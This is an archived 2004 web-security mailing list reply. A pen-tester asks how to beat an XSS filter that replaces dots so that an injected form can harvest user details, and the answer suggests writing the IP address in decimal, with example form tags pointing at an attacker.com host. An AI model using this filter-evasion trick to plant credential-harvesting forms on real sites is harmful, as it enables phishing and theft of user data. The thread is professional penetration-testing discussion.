WebApp Sec mailing list archives

RE: Fullstop Substitution in XSS

From: "Pete Foster" <petef () sec-tec co uk>
Date: Tue, 1 Jun 2004 09:02:20 +0100

Hi Calum

You could use a pure decimal for IP address representation.

Use the online tool at:
http://www.opinionatedgeek.com/DotNet/Tools/CrazyIP/Default.aspx

For example the IP address 192.168.0.1 can be represented as 3232235521.

So your HTML FORM code would look like:

<form target="http://3232235521/path/to/script";>

Hope this helps.

-- 
Pete



-----Original Message-----
From: Calum Power [mailto:enune () fribble net]
Sent: 29 May 2004 05:49
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS


Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum
--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic

enune () fribble net
http://www.fribble.net



__________________________________________________________________________
The contents of this e-mail are confidential and are intended solely for
the use of the person to whom they are addressed.  If you are not the
intended recipient of this message please notify the sender and delete it
immediately, disclosure of its content to any other person is prohibited
and may be unlawful.  Sec-Tec does not accept any responsibility for
viruses and it is your responsibility to scan the e-mail and attachments.
Any liability arising from any third party acting on information contained
in this e-mail is hereby excluded.
--------------------------------------------------------------------------

Current thread:

Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
  - Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)